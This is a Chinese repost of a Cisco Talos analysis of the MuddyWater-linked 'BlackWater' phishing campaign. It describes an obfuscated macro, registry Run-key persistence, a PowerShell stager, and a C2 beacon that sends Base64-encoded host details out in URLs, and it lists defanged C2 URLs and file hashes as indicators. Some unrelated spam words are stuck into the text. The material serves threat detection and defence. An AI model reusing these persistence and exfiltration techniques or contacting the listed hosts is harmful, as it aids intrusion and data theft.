使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析

本文主要是介绍使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

摘要

Cisco Talos团队近期发现名为“BlackWater”的恶意活动与可疑的持续威胁组织MuddyWater相关联。在2019年4月,我们开始监测到新型样本,并对其进行分析,结果表明攻击者已经在常规的运营活动中添加了三个不同的步骤,允许恶意软件绕过某些安全控制,并且MuddyWater的策略、技术和流程(TTPs)已经发展到逃避检测阶段。一旦成功,该恶意软件系列会将基于PowerShell的后门安装到受害者的计算机上,从而为威胁参与者提供远程访问的权限。尽管新型恶意活动表明,威胁参与者正在采取措施来提高其运营过程的安全性,并尽可能逃避终端检测,但我们发现其基础代码仍然保持不变。本文中所描述的分析成果将有助于威胁分析团队识别MuddyWater最新的TTP。

在最新的恶意活动中,威胁行为者首先添加了一个经过混淆后的Visual Basic for Applications(VBA)脚本,通过创建注册表项的方式来建立持久性。接下来,该脚本将触发PowerShell Stager,可能是为了伪装成红方工具,而不会被认为是高级威胁。随后,Stager将与一个威胁行为者控制的服务器进行通信,以获得FruityC2代理脚本的一个组件,这是GitHub上的一个开源框架,可以进一步枚举主机。这样一来,威胁参与者就可以监控Web日志,并确定未参与活动的某人是否向其服务器发出请求以尝试调查该活动。一旦枚举命令运行,代理将与不同的C2进行通信,并在URL字段中发回数据。这样一来,基于主机的检测将会变得更加困难,因为这一过程中并不会生成易于识别的“errors.txt”文件。威胁参与者还采取了额外的步骤来替换近期最新样本中的一些变量字符串,这可能是为了避免根据Yara规则进行基于签名的检测。

在近几个月内观察到的相关恶意样本显示,恶意活动的复杂程度不断增加。一些疑似与MuddyWater相关的样本表明,在2019年2月至3月期间,威胁参与者在受感染的主机上创建了持久性,并使用PowerShell命令枚举受害者的主机IP地址以及命令与控制(C2)服务器的IP地址。所有这些组件都包含在木马化的附件里,因此安全人员只需获得文档的样本,即可发现攻击者的TTP。与之相比,4月发生的恶意活动需要采取多步骤的调查方法。

BlackWater文档分析

Talos团队发现有证据表明恶意样本疑似与恶意组织MuddyWater有关。MuddyWater自2017年11月起至今一直活跃,并且主要针对中东地区的实体。我们有一定证据判断,这些文件是通过网络钓鱼电子邮件的方式发送给受害者的。其中的一个木马文件创建于2019年4月23日,其原始文件的标题是“company information list.doc”。中国菜刀

使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析

文档打开后,它会提示用户启用名称为“BlackWater.bas”的宏。威胁行为者对宏添加了密码保护,如果用户试图在Visual Basic中查看宏,可能会发现该宏无法访问,这可能是一种防逆向技术。威胁行为者使用了替换密码对“blackWater.bas”宏进行了混淆,并使用相应的整数来替换字符。

宏运行时的截图:天空彩

使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析

该宏中包含一个PowerShell脚本,可以在“运行”注册表项KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding中添加条目,从而保证持久性。然后脚本每300秒调用一次文件“\ProgramData\SysTextEnc.ini”。SysTextEnc.ini的明文版本似乎是一个轻量级的Stager。

从文档中找到的Stager的屏幕截图:

使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析

随后,Stager连接位于hxxp://38[.]132[.]99[.]167/crf.txt的威胁行为者控制的C2服务器。crf.txt文件的明文版本非常类似于MuddyWater组织在以土耳其的Krudish政治组织为目标时使用的PowerShell代理。下面的截图中展示了PowerShell木马的前几行。攻击者做了一些微小的改动,例如:修改变量名以避免Yara检测,将命令结果发送到URL中的C2而不是直接将它们写入文件。但是,尽管有上述这些改动,但恶意软件的基本功能仍然是几乎没有变化。值得注意的是,用于枚举主机的许多PowerShell命令似乎是从名为FruityC2的GitHub项目中派生出来的。

针对Krudish政治组织发起攻击的恶意文档中嵌入的PowerShell脚本:二四六

使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析

来自威胁行为者所控制服务器的PowerShell脚本:

使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析

这一系列命令,首先会向C2服务器发送hello消息,然后每隔300秒发送一次后续的hello消息。该信标的一个示例是“hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”。值得注意的是,木马化恶意文档的宏也被称为“BlackWater”,并且该值“BlackWater”也被以硬编码的格式写入到PowerShell脚本中。

接下来,该脚本将枚举受害者的主机。大多数PowerShell命令都会调用Windows Management Instrumentation(WMI),然后查询如下信息:

1. 操作系统的名称(即主机名称);

2. 操作系统的OS架构;

3. 操作系统的版本;

4. 计算机系统的域名;

5. 计算机系统的用户名;

6. 计算机的公网IP地址。

在这里,唯一一个没有调用WMI的命令是“System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash”,这是获取安全系统的MD5哈希值的命令。如果多个工作站在同一网络中被攻陷,那么可能会获取工作站的唯一标识。在获取基于主机的枚举信息之后,它将进行Base64编码,然后将编码后的内容附加到URL POST请求中发送至C2。而在以前的版本中,该信息被写入到文本文件中。编码后命令的示例如下所示:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE=

经过解码后,上述命令将变得更加清晰:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\admin*192.168.000.01

总结

除了本文中描述的新型反检测方法之外,MuddyWater组织还进行了少量修改,以避免常见的基于主机的特征检测方法,并替换变量名称以逃避Yara特征检测。但这些变化是非常简单的,因为其基础代码库和植入功能仍然基本保持不变。然而,尽管这些修改非常微小,但它们足以避免某些检测机制。在上个月,MuddyWater的一些恶意活动被公开披露,但该组织没有受到这方面的影响,持续开展恶意活动。基于上述观察以及MuddyWater针对土耳其实体的历史恶意活动,我们有理由判断,这一系列恶意活动与MuddyWater恶意组织相关。

IoC

恶意样本哈希值

0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad

9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7

0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2

A3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da981

6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad

Bef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6

B2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93

4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60

576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf

062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717

URL

hxxp://38[.]132[.]99[.]167/crf.txt

hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater

hxxp://82[.]102[.]8[.]101/bcerrxy.php?

hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php

hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php

hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/

hxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df

hxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh

hxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG

检测

Doc.Dropper.Pwshell::malicious.tht.talos

这篇关于使用新型反检测技术:与MuddyWater相关的BlackWater恶意活动分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/779206

相关文章

中文分词jieba库的使用与实景应用(一)

知识星球:https://articles.zsxq.com/id_fxvgc803qmr2.html 目录 一.定义: 精确模式(默认模式): 全模式: 搜索引擎模式: paddle 模式(基于深度学习的分词模式): 二 自定义词典 三.文本解析   调整词出现的频率 四. 关键词提取 A. 基于TF-IDF算法的关键词提取 B. 基于TextRank算法的关键词提取

使用SecondaryNameNode恢复NameNode的数据

1)需求: NameNode进程挂了并且存储的数据也丢失了,如何恢复NameNode 此种方式恢复的数据可能存在小部分数据的丢失。 2)故障模拟 (1)kill -9 NameNode进程 [lytfly@hadoop102 current]$ kill -9 19886 (2)删除NameNode存储的数据(/opt/module/hadoop-3.1.4/data/tmp/dfs/na

Hadoop数据压缩使用介绍

一、压缩原则 (1)运算密集型的Job,少用压缩 (2)IO密集型的Job,多用压缩 二、压缩算法比较 三、压缩位置选择 四、压缩参数配置 1)为了支持多种压缩/解压缩算法,Hadoop引入了编码/解码器 2)要在Hadoop中启用压缩,可以配置如下参数

Makefile简明使用教程

文章目录 规则makefile文件的基本语法:加在命令前的特殊符号:.PHONY伪目标: Makefilev1 直观写法v2 加上中间过程v3 伪目标v4 变量 make 选项-f-n-C Make 是一种流行的构建工具,常用于将源代码转换成可执行文件或者其他形式的输出文件(如库文件、文档等)。Make 可以自动化地执行编译、链接等一系列操作。 规则 makefile文件

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

使用opencv优化图片(画面变清晰)

文章目录 需求影响照片清晰度的因素 实现降噪测试代码 锐化空间锐化Unsharp Masking频率域锐化对比测试 对比度增强常用算法对比测试 需求 对图像进行优化,使其看起来更清晰,同时保持尺寸不变,通常涉及到图像处理技术如锐化、降噪、对比度增强等 影响照片清晰度的因素 影响照片清晰度的因素有很多,主要可以从以下几个方面来分析 1. 拍摄设备 相机传感器:相机传

综合安防管理平台LntonAIServer视频监控汇聚抖动检测算法优势

LntonAIServer视频质量诊断功能中的抖动检测是一个专门针对视频稳定性进行分析的功能。抖动通常是指视频帧之间的不必要运动,这种运动可能是由于摄像机的移动、传输中的错误或编解码问题导致的。抖动检测对于确保视频内容的平滑性和观看体验至关重要。 优势 1. 提高图像质量 - 清晰度提升:减少抖动,提高图像的清晰度和细节表现力,使得监控画面更加真实可信。 - 细节增强:在低光条件下,抖

sqlite3 相关知识

WAL 模式 VS 回滚模式 特性WAL 模式回滚模式(Rollback Journal)定义使用写前日志来记录变更。使用回滚日志来记录事务的所有修改。特点更高的并发性和性能;支持多读者和单写者。支持安全的事务回滚,但并发性较低。性能写入性能更好,尤其是读多写少的场景。写操作会造成较大的性能开销,尤其是在事务开始时。写入流程数据首先写入 WAL 文件,然后才从 WAL 刷新到主数据库。数据在开始

【专题】2024飞行汽车技术全景报告合集PDF分享(附原数据表)

原文链接: https://tecdat.cn/?p=37628 6月16日,小鹏汇天旅航者X2在北京大兴国际机场临空经济区完成首飞,这也是小鹏汇天的产品在京津冀地区进行的首次飞行。小鹏汇天方面还表示,公司准备量产,并计划今年四季度开启预售小鹏汇天分体式飞行汽车,探索分体式飞行汽车城际通勤。阅读原文,获取专题报告合集全文,解锁文末271份飞行汽车相关行业研究报告。 据悉,业内人士对飞行汽车行业

pdfmake生成pdf的使用

实际项目中有时会有根据填写的表单数据或者其他格式的数据,将数据自动填充到pdf文件中根据固定模板生成pdf文件的需求 文章目录 利用pdfmake生成pdf文件1.下载安装pdfmake第三方包2.封装生成pdf文件的共用配置3.生成pdf文件的文件模板内容4.调用方法生成pdf 利用pdfmake生成pdf文件 1.下载安装pdfmake第三方包 npm i pdfma